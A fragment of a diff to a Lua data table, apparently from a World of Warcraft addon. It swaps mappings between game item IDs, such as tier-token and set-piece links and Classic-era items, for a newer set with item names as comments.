Earthfury Legguards + ["16843"] = { + 226614, -- Earthfury Legguards }, - -- Gloves of the Corruptor - ["30211"] = { - 30241, -- Gloves of the Vanquished Hero + -- Earthfury Epaulets + ["16844"] = { + 226611, -- Earthfury Epaulets }, - -- Hood of the Corruptor - ["30212"] = { - 30244, -- Helm of the Vanquished Hero + -- Giantstalker's Breastplate + ["16845"] = { + 226534, -- Giantstalker's Breastplate }, - -- Leggings of the Corruptor - ["30213"] = { - 30247, -- Leggings of the Vanquished Hero + -- Giantstalker's Helmet + ["16846"] = { + 226533, -- Giantstalker's Helmet }, - -- Robe of the Corruptor - ["30214"] = { - 30238, -- Chestguard of the Vanquished Hero + -- Giantstalker's Leggings + ["16847"] = { + 226532, -- Giantstalker's Leggings }, - -- Mantle of the Corruptor - ["30215"] = { - 30250, -- Pauldrons of the Vanquished Hero + -- Giantstalker's Epaulets + ["16848"] = { + 226527, -- Giantstalker's Epaulets }, - -- Nordrassil Chestguard - ["30216"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Giantstalker's Boots + ["16849"] = { + 226531, -- Giantstalker's Boots }, - -- Nordrassil Gloves - ["30217"] = { - 30240, -- Gloves of the Vanquished Defender + -- Giantstalker's Bracers + ["16850"] = { + 226530, -- Giantstalker's Bracers }, - -- Nordrassil Headguard - ["30219"] = { - 30243, -- Helm of the Vanquished Defender + -- Giantstalker's Belt + ["16851"] = { + 226529, -- Giantstalker's Belt }, - -- Nordrassil Life-Kilt - ["30220"] = { - 30246, -- Leggings of the Vanquished Defender + -- Giantstalker's Gloves + ["16852"] = { + 226528, -- Giantstalker's Gloves }, - -- Nordrassil Life-Mantle - ["30221"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Lawbringer Chestguard + ["16853"] = { + 226595, -- Lawbringer Chestguard }, - -- Nordrassil Chestplate - ["30222"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Lawbringer Helm + ["16854"] = { + 226590, -- Lawbringer Helm }, - -- Nordrassil Handgrips - ["30223"] = { - 30240, -- Gloves of the Vanquished Defender + -- Lawbringer Legplates + ["16855"] = { + 226594, -- Lawbringer Legplates }, - -- Nordrassil Headdress - ["30228"] = { - 30243, -- Helm of the Vanquished Defender + -- Lawbringer Spaulders + ["16856"] = { + 226588, -- Lawbringer Spaulders }, - -- Nordrassil Feral-Kilt - ["30229"] = { - 30246, -- Leggings of the Vanquished Defender + -- Lawbringer Bracers + ["16857"] = { + 226589, -- Lawbringer Bracers }, - -- Nordrassil Feral-Mantle - ["30230"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Lawbringer Belt + ["16858"] = { + 226592, -- Lawbringer Belt }, - -- Nordrassil Chestpiece - ["30231"] = { - 30237, -- Chestguard of the Vanquished Defender + -- Lawbringer Boots + ["16859"] = { + 226593, -- Lawbringer Boots }, - -- Nordrassil Gauntlets - ["30232"] = { - 30240, -- Gloves of the Vanquished Defender + -- Lawbringer Gauntlets + ["16860"] = { + 226591, -- Lawbringer Gauntlets }, - -- Nordrassil Headpiece - ["30233"] = { - 30243, -- Helm of the Vanquished Defender + -- Bracers of Might + ["16861"] = { + 226484, -- Bracers of Might }, - -- Nordrassil Wrath-Kilt - ["30234"] = { - 30246, -- Leggings of the Vanquished Defender + -- Sabatons of Might + ["16862"] = { + 226487, -- Sabatons of Might }, - -- Nordrassil Wrath-Mantle - ["30235"] = { - 30249, -- Pauldrons of the Vanquished Defender + -- Gauntlets of Might + ["16863"] = { + 226486, -- Gauntlets of Might }, - -- Chestguard of the Vanquished Champion - ["30236"] = { - 30123, -- Crystalforge Chestguard - 30129, -- Crystalforge Breastplate - 30134, -- Crystalforge Chestpiece - 30144, -- Deathmantle Chestguard - 30164, -- Cataclysm Chestguard - 30169, -- Cataclysm Chestpiece - 30185, -- Cataclysm Chestplate + -- Belt of Might + ["16864"] = { + 226485, -- Belt of Might }, - -- Chestguard of the Vanquished Defender - ["30237"] = { - 30113, -- Destroyer Chestguard - 30118, -- Destroyer Breastplate - 30150, -- Vestments of the Avatar - 30159, -- Shroud of the Avatar - 30216, -- Nordrassil Chestguard - 30222, -- Nordrassil Chestplate - 30231, -- Nordrassil Chestpiece + -- Breastplate of Might + ["16865"] = { + 226489, -- Breastplate of Might }, - -- Chestguard of the Vanquished Hero - ["30238"] = { - 30139, -- Rift Stalker Hauberk - 30196, -- Robes of Tirisfal - 30214, -- Robe of the Corruptor + -- Helm of Might + ["16866"] = { + 226488, -- Helm of Might }, - -- Gloves of the Vanquished Champion - ["30239"] = { - 30124, -- Crystalforge Handguards - 30130, -- Crystalforge Gauntlets - 30135, -- Crystalforge Gloves - 30145, -- Deathmantle Handguards - 30165, -- Cataclysm Gloves - 30170, -- Cataclysm Handgrips - 30189, -- Cataclysm Gauntlets + -- Legplates of Might + ["16867"] = { + 226490, -- Legplates of Might }, - -- Gloves of the Vanquished Defender - ["30240"] = { - 30114, -- Destroyer Handguards - 30119, -- Destroyer Gauntlets - 30151, -- Gloves of the Avatar - 30160, -- Handguards of the Avatar - 30217, -- Nordrassil Gloves - 30223, -- Nordrassil Handgrips - 30232, -- Nordrassil Gauntlets + -- Pauldrons of Might + ["16868"] = { + 226492, -- Pauldrons of Might }, - -- Gloves of the Vanquished Hero - ["30241"] = { - 30140, -- Rift Stalker Gauntlets - 30205, -- Gloves of Tirisfal - 30211, -- Gloves of the Corruptor + -- Band of Accuria + ["17063"] = { + 228286, -- Band of Accuria }, - -- Helm of the Vanquished Champion - ["30242"] = { - 30125, -- Crystalforge Faceguard - 30131, -- Crystalforge War-Helm - 30136, -- Crystalforge Greathelm - 30146, -- Deathmantle Helm - 30166, -- Cataclysm Headguard - 30171, -- Cataclysm Headpiece - 30190, -- Cataclysm Helm + -- Shard of the Scale + ["17064"] = { + 228298, -- Shard of the Scale }, - -- Helm of the Vanquished Defender - ["30243"] = { - 30115, -- Destroyer Greathelm - 30120, -- Destroyer Battle-Helm - 30152, -- Cowl of the Avatar - 30161, -- Hood of the Avatar - 30219, -- Nordrassil Headguard - 30228, -- Nordrassil Headdress - 30233, -- Nordrassil Headpiece + -- Medallion of Steadfast Might + ["17065"] = { + 228249, -- Medallion of Steadfast Might }, - -- Helm of the Vanquished Hero - ["30244"] = { - 30141, -- Rift Stalker Helm - 30206, -- Cowl of Tirisfal - 30212, -- Hood of the Corruptor + -- Drillborer Disk + ["17066"] = { + 228702, -- Drillborer Disk }, - -- Leggings of the Vanquished Champion - ["30245"] = { - 30126, -- Crystalforge Legguards - 30132, -- Crystalforge Greaves - 30137, -- Crystalforge Leggings - 30148, -- Deathmantle Legguards - 30167, -- Cataclysm Legguards - 30172, -- Cataclysm Leggings - 30192, -- Cataclysm Legplates + -- Ancient Cornerstone Grimoire + ["17067"] = { + 228955, -- Ancient Cornerstone Grimoire }, - -- Leggings of the Vanquished Defender - ["30246"] = { - 30116, -- Destroyer Legguards - 30121, -- Destroyer Greaves - 30153, -- Breeches of the Avatar - 30162, -- Leggings of the Avatar - 30220, -- Nordrassil Life-Kilt - 30229, -- Nordrassil Feral-Kilt - 30234, -- Nordrassil Wrath-Kilt + -- Striker's Mark + ["17069"] = { + 228252, -- Striker's Mark }, - -- Leggings of the Vanquished Hero - ["30247"] = { - 30142, -- Rift Stalker Leggings - 30207, -- Leggings of Tirisfal - 30213, -- Leggings of the Corruptor + -- Fang of the Mystics + ["17070"] = { + 228382, -- Fang of the Mystics }, - -- Pauldrons of the Vanquished Champion - ["30248"] = { - 30127, -- Crystalforge Shoulderguards - 30133, -- Crystalforge Shoulderbraces - 30138, -- Crystalforge Pauldrons - 30149, -- Deathmantle Shoulderpads - 30168, -- Cataclysm Shoulderguards - 30173, -- Cataclysm Shoulderpads - 30194, -- Cataclysm Shoulderplates + -- Gutgore Ripper + ["17071"] = { + 228267, -- Gutgore Ripper }, - -- Pauldrons of the Vanquished Defender - ["30249"] = { - 30117, -- Destroyer Shoulderguards - 30122, -- Destroyer Shoulderblades - 30154, -- Mantle of the Avatar - 30163, -- Wings of the Avatar - 30221, -- Nordrassil Life-Mantle - 30230, -- Nordrassil Feral-Mantle - 30235, -- Nordrassil Wrath-Mantle + -- Blastershot Launcher + ["17072"] = { + 228270, -- Blastershot Launcher }, - -- Pauldrons of the Vanquished Hero - ["30250"] = { - 30143, -- Rift Stalker Mantle - 30210, -- Mantle of Tirisfal - 30215, -- Mantle of the Corruptor + -- Earthshaker + ["17073"] = { + 228248, -- Earthshaker }, - -- Pattern: Belt of Blasting - ["30280"] = { - 30038, -- Belt of Blasting + -- Shadowstrike + ["17074"] = { + 228272, -- Shadowstrike }, - -- Pattern: Belt of the Long Road - ["30281"] = { - 30036, -- Belt of the Long Road + -- Bonereaver's Edge + ["17076"] = { + 228461, -- Bonereaver's Edge }, - -- Pattern: Boots of Blasting - ["30282"] = { - 30037, -- Boots of Blasting + -- Crimson Shocker + ["17077"] = { + 228262, -- Crimson Shocker }, - -- Pattern: Boots of the Long Road - ["30283"] = { - 30035, -- Boots of the Long Road + -- Shard of the Flame + ["17082"] = { + 228297, -- Shard of the Flame }, - -- Pattern: Belt of Natural Power - ["30301"] = { - 30042, -- Belt of Natural Power + -- Cloak of the Shrouded Mists + ["17102"] = { + 228290, -- Cloak of the Shrouded Mists }, - -- Pattern: Belt of Deep Shadow - ["30302"] = { - 30040, -- Belt of Deep Shadow + -- Azuresong Mageblade + ["17103"] = { + 228269, -- Azuresong Mageblade }, - -- Pattern: Belt of the Black Eagle - ["30303"] = { - 30046, -- Belt of the Black Eagle + -- Spinal Reaper + ["17104"] = { + 228299, -- Spinal Reaper }, - -- Pattern: Monsoon Belt - ["30304"] = { - 30044, -- Monsoon Belt + -- Aurastone Hammer + ["17105"] = { + 228462, -- Aurastone Hammer }, - -- Pattern: Boots of Natural Grace - ["30305"] = { - 30041, -- Boots of Natural Grace + -- Malistar's Defender + ["17106"] = { + 228294, -- Malistar's Defender }, - -- Pattern: Boots of Utter Darkness - ["30306"] = { - 30039, -- Boots of Utter Darkness + -- Dragon's Blood Cape + ["17107"] = { + 228292, -- Dragon's Blood Cape }, - -- Pattern: Boots of the Crimson Hawk - ["30307"] = { - 30045, -- Boots of the Crimson Hawk + -- Choker of Enlightenment + ["17109"] = { + 228247, -- Choker of Enlightenment }, - -- Pattern: Hurricane Boots - ["30308"] = { - 30043, -- Hurricane Boots + -- Seal of the Archmagus + ["17110"] = { + 228268, -- Seal of the Archmagus }, - -- Plans: Belt of the Guardian - ["30321"] = { - 30034, -- Belt of the Guardian + -- Blazefury Medallion + ["17111"] = { + 228354, -- Blazefury Medallion }, - -- Plans: Red Belt of Battle - ["30322"] = { - 30032, -- Red Belt of Battle + -- Empyrean Demolisher + ["17112"] = { + 228397, -- Empyrean Demolisher }, - -- Plans: Boots of the Protector - ["30323"] = { - 30033, -- Boots of the Protector + -- Amberseal Keeper + ["17113"] = { + 228356, -- Amberseal Keeper }, - -- Plans: Red Havoc Boots - ["30324"] = { - 30031, -- Red Havoc Boots + -- Sulfuras, Hand of Ragnaros + ["17182"] = { + 17204, -- Eye of Sulfuras }, - -- Onslaught Gauntlets - ["30969"] = { - 31094, -- Gloves of the Forgotten Protector + -- Sulfuron Hammer + ["17193"] = { + 227684, -- Sulfuron Hammer }, - -- Onslaught Handguards - ["30970"] = { - 31094, -- Gloves of the Forgotten Protector + -- Eye of Sulfuras + ["17204"] = { + 17182, -- Sulfuras, Hand of Ragnaros }, - -- Onslaught Battle-Helm - ["30972"] = { - 31095, -- Helm of the Forgotten Protector + -- Thunderstrike + ["17223"] = { + 228273, -- Thunderstrike }, - -- Onslaught Greathelm - ["30974"] = { - 31095, -- Helm of the Forgotten Protector + -- Knight-Captain's Satin Leggings + ["17599"] = { + 227137, -- Knight-Captain's Satin Leggings }, - -- Onslaught Breastplate - ["30975"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Gemshard Heart + ["17707"] = { + 223541, -- Gemshard Heart }, - -- Onslaught Chestguard - ["30976"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Charstone Dirk + ["17710"] = { + 223518, -- Charstone Dirk }, - -- Onslaught Greaves - ["30977"] = { - 31100, -- Leggings of the Forgotten Protector + -- Eye of Theradras + ["17715"] = { + 223519, -- Eye of Theradras }, - -- Onslaught Legguards - ["30978"] = { - 31100, -- Leggings of the Forgotten Protector + -- Megashot Rifle + ["17717"] = { + 223542, -- Megashot Rifle }, - -- Onslaught Shoulderblades - ["30979"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Gizlock's Hypertech Buckler + ["17718"] = { + 223545, -- Gizlock's Hypertech Buckler }, - -- Onslaught Shoulderguards - ["30980"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Inventor's Focal Sword + ["17719"] = { + 223520, -- Inventor's Focal Sword }, - -- Lightbringer Gauntlets - ["30982"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Rotgrip Mantle + ["17732"] = { + 223521, -- Rotgrip Mantle }, - -- Lightbringer Gloves - ["30983"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Fist of Stone + ["17733"] = { + 223524, -- Fist of Stone }, - -- Lightbringer Handguards - ["30985"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Helm of the Mountain + ["17734"] = { + 223522, -- Helm of the Mountain }, - -- Lightbringer Faceguard - ["30987"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Cloud Stone + ["17737"] = { + 223523, -- Cloud Stone }, - -- Lightbringer Greathelm - ["30988"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Soothsayer's Headdress + ["17740"] = { + 223525, -- Soothsayer's Headdress }, - -- Lightbringer War-Helm - ["30989"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Vinerot Sandals + ["17748"] = { + 223543, -- Vinerot Sandals }, - -- Lightbringer Breastplate - ["30990"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Princess Theradras' Scepter + ["17766"] = { + 221780, -- Princess Theradras' Scepter }, - -- Lightbringer Chestguard - ["30991"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Blade of Eternal Darkness + ["17780"] = { + 223964, -- Blade of Eternal Darkness }, - -- Lightbringer Chestpiece - ["30992"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Fist of Stone + ["17943"] = { + 223524, -- Fist of Stone }, - -- Lightbringer Greaves - ["30993"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Onyxia Hide Backpack + ["17966"] = { + 228992, -- Onyxia Hide Backpack }, - -- Lightbringer Leggings - ["30994"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Flame Walkers + ["18047"] = { + 228602, -- Flame Walkers }, - -- Lightbringer Legguards - ["30995"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Jumanza Grips + ["18083"] = { + 223534, -- Jumanza Grips }, - -- Lightbringer Pauldrons - ["30996"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Band of Rumination + ["18103"] = { + 228675, -- Band of Rumination }, - -- Lightbringer Shoulderbraces - ["30997"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Feralsurge Girdle + ["18104"] = { + 228676, -- Feralsurge Girdle }, - -- Lightbringer Shoulderguards - ["30998"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Eskhandar's Left Claw + ["18202"] = { + 228349, -- Eskhandar's Left Claw }, - -- Gronnstalker's Gloves - ["31001"] = { - 31094, -- Gloves of the Forgotten Protector + -- Eskhandar's Right Claw + ["18203"] = { + 228350, -- Eskhandar's Right Claw }, - -- Gronnstalker's Helmet - ["31003"] = { - 31095, -- Helm of the Forgotten Protector + -- Eskhandar's Pelt + ["18204"] = { + 228360, -- Eskhandar's Pelt }, - -- Gronnstalker's Chestguard - ["31004"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Drape of Benediction + ["18208"] = { + 228389, -- Drape of Benediction }, - -- Gronnstalker's Leggings - ["31005"] = { - 31100, -- Leggings of the Forgotten Protector + -- Fiendish Machete + ["18310"] = { + 228056, -- Fiendish Machete }, - -- Gronnstalker's Spaulders - ["31006"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Quel'dorai Channeling Rod + ["18311"] = { + 228051, -- Quel'dorai Channeling Rod }, - -- Skyshatter Gloves - ["31007"] = { - 31094, -- Gloves of the Forgotten Protector + -- Energized Chestplate + ["18312"] = { + 228055, -- Energized Chestplate }, - -- Skyshatter Gauntlets - ["31008"] = { - 31094, -- Gloves of the Forgotten Protector + -- Ring of Demonic Guile + ["18314"] = { + 228699, -- Ring of Demonic Guile }, - -- Skyshatter Grips - ["31011"] = { - 31094, -- Gloves of the Forgotten Protector + -- Ring of Demonic Potency + ["18315"] = { + 228057, -- Ring of Demonic Potency }, - -- Skyshatter Helmet - ["31012"] = { - 31095, -- Helm of the Forgotten Protector + -- Tempest Talisman + ["18317"] = { + 228054, -- Tempest Talisman }, - -- Skyshatter Headguard - ["31014"] = { - 31095, -- Helm of the Forgotten Protector + -- Fervent Helm + ["18319"] = { + 228053, -- Fervent Helm }, - -- Skyshatter Cover - ["31015"] = { - 31095, -- Helm of the Forgotten Protector + -- Satyr's Bow + ["18323"] = { + 228050, -- Satyr's Bow }, - -- Skyshatter Chestguard - ["31016"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Waveslicer + ["18324"] = { + 228052, -- Waveslicer }, - -- Skyshatter Breastplate - ["31017"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Quel'Serrar + ["18348"] = { + 228679, -- Quel'Serrar }, - -- Skyshatter Tunic - ["31018"] = { - 31091, -- Chestguard of the Forgotten Protector + -- Garona: A Study on Stealth and Treachery + ["18356"] = { + 228691, -- Garona: A Study on Stealth and Treachery }, - -- Skyshatter Leggings - ["31019"] = { - 31100, -- Leggings of the Forgotten Protector + -- Codex of Defense + ["18357"] = { + 228692, -- Codex of Defense }, - -- Skyshatter Legguards - ["31020"] = { - 31100, -- Leggings of the Forgotten Protector + -- The Arcanist's Cookbook + ["18358"] = { + 228693, -- The Arcanist's Cookbook }, - -- Skyshatter Pants - ["31021"] = { - 31100, -- Leggings of the Forgotten Protector + -- The Light and How to Swing It + ["18359"] = { + 228690, -- The Light and How to Swing It }, - -- Skyshatter Shoulderpads - ["31022"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Silvermoon Leggings + ["18378"] = { + 228470, -- Silvermoon Leggings }, - -- Skyshatter Mantle - ["31023"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Eldritch Reinforced Legplates + ["18380"] = { + 228069, -- Eldritch Reinforced Legplates }, - -- Skyshatter Pauldrons - ["31024"] = { - 31103, -- Pauldrons of the Forgotten Protector + -- Brightspark Gloves + ["18387"] = { + 228061, -- Brightspark Gloves }, - -- Slayer's Handguards - ["31026"] = { - 31093, -- Gloves of the Forgotten Vanquisher + -- Stoneshatter + ["18388"] = { + 228471, -- Stoneshatter }, - -- Slayer's Helm - ["31027"] = { - 31096, -- Helm of the Forgotten Vanquisher + -- Tanglemoss Leggings + ["18390"] = { + 228468, -- Tanglemoss Leggings }, - -- Slayer's Chestguard - ["31028"] = { - 31090, -- Chestguard of the Forgotten Vanquisher + -- Distracting Dagger + ["18392"] = { + 228472, -- Distracting Dagger }, - -- Slayer's Legguards - ["31029"] = { - 31099, -- Leggings of the Forgotten Vanquisher + -- Warpwood Binding + ["18393"] = { + 228063, -- Warpwood Binding }, - -- Slayer's Shoulderpads - ["31030"] = { - 31102, -- Pauldrons of the Forgotten Vanquisher + -- Elder Magus Pendant + ["18397"] = { + 228067, -- Elder Magus Pendant }, - -- Thunderheart Gloves - ["31032"] = { - 31093, -- Gloves of the Forgotten Vanquisher + -- Tidal Loop + ["18398"] = { + 227454, -- Tidal Loop }, - -- Thunderheart Gauntlets - ["31034"] = { - 31093, -- Gloves of the Forgotten Vanquisher + -- Ocean's Breeze + ["18399"] = { + 227455, -- Ocean's Breeze }, - -- Thunderheart Handguards - ["31035"] = { - 31093, -- Gloves of the Forgotten Vanquisher + -- Dragonslayer's Signet + ["18403"] = { + 18422, -- Head of Onyxia (Horde) }, - -- Thunderheart Helmet - ["31037"] = { - 31096, -- Helm of the Forgotten Vanquisher + -- Onyxia Tooth Pendant + ["18404"] = { + 18422, -- Head of Onyxia (Horde) }, - -- Thunderheart Cover - ["31039"] = { - 31096, -- Helm of the Forgotten Vanquisher + -- Onyxia Blood Talisman + ["18406"] = { + 18422, -- Head of Onyxia (Horde) }, - -- Thunderheart Headguard - ["31040"] = { - 31096, -- Helm of the Forgotten Vanquisher + -- Head of Onyxia (Horde) + ["18422"] = { + 18403, -- Dragonslayer's Signet + 18404, -- Onyxia Tooth Pendant + 18406, -- Onyxia Blood Talisman + 18423, -- Head of Onyxia (Alliance) }, - -- Thunderheart Tunic - ["31041"] = { - 31090, -- Chestguard of the Forgotten Vanquisher + -- Head of Onyxia (Alliance) + ["18423"] = { + 18403, -- Dragonslayer's Signet + 18404, -- Onyxia Tooth Pendant + 18406, -- Onyxia Blood Talisman + 18422, -- Head of Onyxia (Horde) }, - -- Thunderheart Chestguard - ["31042"] = { - 31090, -- Chestguard of the Forgotten Vanquisher + -- First Sergeant's Plate Bracers + ["18429"] = { + 216705, -- First Sergeant's Plate Bracers }, - -- Thunderheart Vest - ["31043"] = { - 31090, -- Chestguard of the Forgotten Vanquisher + -- First Sergeant's Plate Bracers + ["18430"] = { + 216705, -- First Sergeant's Plate Bracers }, - -- Thunderheart Leggings - ["31044"] = { - 31099, -- Leggings of the Forgotten Vanquisher + -- First Sergeant's Mail Wristguards + ["18432"] = { + 216703, -- First Sergeant's Mail Wristguards }, - -- Thunderheart Legguards - ["31045"] = { - 31099, -- Leggings of the Forgotten Vanquisher + -- First Sergeant's Dragonhide Armguards + ["18434"] = { + 216704, -- First Sergeant's Dragonhide Armguards }, - -- Thunderheart Pants - ["31046"] = { - 31099, -- Leggings of the Forgotten Vanquisher + -- First Sergeant's Leather Armguards + ["18435"] = { + 216706, -- First Sergeant's Leather Armguards }, - -- Thunderheart Spaulders - ["31047"] = { - 31102, -- Pauldrons of the Forgotten Vanquisher + -- First Sergeant's Dragonhide Armguards + ["18436"] = { + 216704, -- First Sergeant's Dragonhide Armguards }, - -- Thunderheart Pauldrons - ["31048"] = { - 31102, -- Pauldrons of the Forgotten Vanquisher + -- First Sergeant's Silk Cuffs + ["18437"] = { + 216707, -- First Sergeant's Silk Cuffs }, - -- Thunderheart Shoulderpads - ["31049"] = { - 31102, -- Pauldrons of the Forgotten Vanquisher + -- Sergeant Major's Plate Wristguards + ["18445"] = { + 216701, -- Sergeant Major's Plate Wristguards }, - -- Gloves of the Malefic - ["31050"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Sergeant Major's Plate Wristguards + ["18447"] = { + 216701, -- Sergeant Major's Plate Wristguards }, - -- Hood of the Malefic - ["31051"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Sergeant Major's Chain Armguards + ["18448"] = { + 216699, -- Sergeant Major's Chain Armguards }, - -- Robe of the Malefic - ["31052"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Sergeant Major's Chain Armguards + ["18449"] = { + 216699, -- Sergeant Major's Chain Armguards }, - -- Leggings of the Malefic - ["31053"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Sergeant Major's Leather Armsplints + ["18452"] = { + 216700, -- Sergeant Major's Leather Armsplints }, - -- Mantle of the Malefic - ["31054"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Sergeant Major's Leather Armsplints + ["18453"] = { + 216700, -- Sergeant Major's Leather Armsplints }, - -- Gloves of the Tempest - ["31055"] = { - 31093, -- Gloves of the Forgotten Vanquisher + -- Sergeant Major's Dragonhide Armsplints + ["18454"] = { + 216698, -- Sergeant Major's Dragonhide Armsplints }, - -- Cowl of the Tempest - ["31056"] = { - 31096, -- Helm of the Forgotten Vanquisher + -- Sergeant Major's Dragonhide Armsplints + ["18455"] = { + 216698, -- Sergeant Major's Dragonhide Armsplints }, - -- Robes of the Tempest - ["31057"] = { - 31090, -- Chestguard of the Forgotten Vanquisher + -- Sergeant Major's Silk Cuffs + ["18456"] = { + 216702, -- Sergeant Major's Silk Cuffs }, - -- Leggings of the Tempest - ["31058"] = { - 31099, -- Leggings of the Forgotten Vanquisher + -- Sergeant Major's Silk Cuffs + ["18457"] = { + 216702, -- Sergeant Major's Silk Cuffs }, - -- Mantle of the Tempest - ["31059"] = { - 31102, -- Pauldrons of the Forgotten Vanquisher + -- Royal Seal of Eldre'Thalas + ["18465"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Gloves of Absolution - ["31060"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18466"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Handguards of Absolution - ["31061"] = { - 31092, -- Gloves of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18467"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Cowl of Absolution - ["31063"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18468"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Hood of Absolution - ["31064"] = { - 31097, -- Helm of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18469"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Shroud of Absolution - ["31065"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18470"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Vestments of Absolution - ["31066"] = { - 31089, -- Chestguard of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18471"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Leggings of Absolution - ["31067"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18472"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Breeches of Absolution - ["31068"] = { - 31098, -- Leggings of the Forgotten Conqueror + -- Royal Seal of Eldre'Thalas + ["18473"] = { + 228467, -- Royal Seal of Eldre'Thalas }, - -- Mantle of Absolution - ["31069"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Observer's Shield + ["18485"] = { + 228064, -- Observer's Shield }, - -- Shoulderpads of Absolution - ["31070"] = { - 31101, -- Pauldrons of the Forgotten Conqueror + -- Heated Ancient Blade + ["18488"] = { + 228696, -- Heated Ancient Blade }, - -- Chestguard of the Forgotten Conqueror - ["31089"] = { - 30990, -- Lightbringer Breastplate - 30991, -- Lightbringer Chestguard - 30992, -- Lightbringer Chestpiece - 31052, -- Robe of the Malefic - 31065, -- Shroud of Absolution - 31066, -- Vestments of Absolution + -- Insightful Hood + ["18490"] = { + 228062, -- Insightful Hood }, - -- Chestguard of the Forgotten Vanquisher - ["31090"] = { - 31028, -- Slayer's Chestguard - 31041, -- Thunderheart Tunic - 31042, -- Thunderheart Chestguard - 31043, -- Thunderheart Vest - 31057, -- Robes of the Tempest + -- Treated Ancient Blade + ["18492"] = { + 228697, -- Treated Ancient Blade }, - -- Chestguard of the Forgotten Protector - ["31091"] = { - 30975, -- Onslaught Breastplate - 30976, -- Onslaught Chestguard - 31004, -- Gronnstalker's Chestguard - 31016, -- Skyshatter Chestguard - 31017, -- Skyshatter Breastplate - 31018, -- Skyshatter Tunic + -- Bulky Iron Spaulders + ["18493"] = { + 228058, -- Bulky Iron Spaulders }, - -- Gloves of the Forgotten Conqueror - ["31092"] = { - 30982, -- Lightbringer Gauntlets - 30983, -- Lightbringer Gloves - 30985, -- Lightbringer Handguards - 31050, -- Gloves of the Malefic - 31060, -- Gloves of Absolution - 31061, -- Handguards of Absolution + -- Denwatcher's Shoulders + ["18494"] = { + 228059, -- Denwatcher's Shoulders }, - -- Gloves of the Forgotten Vanquisher - ["31093"] = { - 31026, -- Slayer's Handguards - 31032, -- Thunderheart Gloves - 31034, -- Thunderheart Gauntlets - 31035, -- Thunderheart Handguards - 31055, -- Gloves of the Tempest + -- Heliotrope Cloak + ["18496"] = { + 228060, -- Heliotrope Cloak }, - -- Gloves of the Forgotten Protector - ["31094"] = { - 30969, -- Onslaught Gauntlets - 30970, -- Onslaught Handguards - 31001, -- Gronnstalker's Gloves - 31007, -- Skyshatter Gloves - 31008, -- Skyshatter Gauntlets - 31011, -- Skyshatter Grips + -- Tarnished Elven Ring + ["18500"] = { + 228469, -- Tarnished Elven Ring }, - -- Helm of the Forgotten Protector - ["31095"] = { - 30972, -- Onslaught Battle-Helm - 30974, -- Onslaught Greathelm - 31003, -- Gronnstalker's Helmet - 31012, -- Skyshatter Helmet - 31014, -- Skyshatter Headguard - 31015, -- Skyshatter Cover + -- Mugger's Belt + ["18505"] = { + 228068, -- Mugger's Belt }, - -- Helm of the Forgotten Vanquisher - ["31096"] = { - 31027, -- Slayer's Helm - 31037, -- Thunderheart Helmet - 31039, -- Thunderheart Cover - 31040, -- Thunderheart Headguard - 31056, -- Cowl of the Tempest + -- A Dull and Flat Elven Blade + ["18513"] = { + 228695, -- A Dull and Flat Elven Blade }, - -- Helm of the Forgotten Conqueror - ["31097"] = { - 30987, -- Lightbringer Faceguard - 30988, -- Lightbringer Greathelm - 30989, -- Lightbringer War-Helm - 31051, -- Hood of the Malefic - 31063, -- Cowl of Absolution - 31064, -- Hood of Absolution + -- Barbarous Blade + ["18520"] = { + 228478, -- Barbarous Blade }, - -- Leggings of the Forgotten Conqueror - ["31098"] = { - 30993, -- Lightbringer Greaves - 30994, -- Lightbringer Leggings - 30995, -- Lightbringer Legguards - 31053, -- Leggings of the Malefic - 31067, -- Leggings of Absolution - 31068, -- Breeches of Absolution + -- Leggings of Destruction + ["18524"] = { + 228479, -- Leggings of Destruction }, 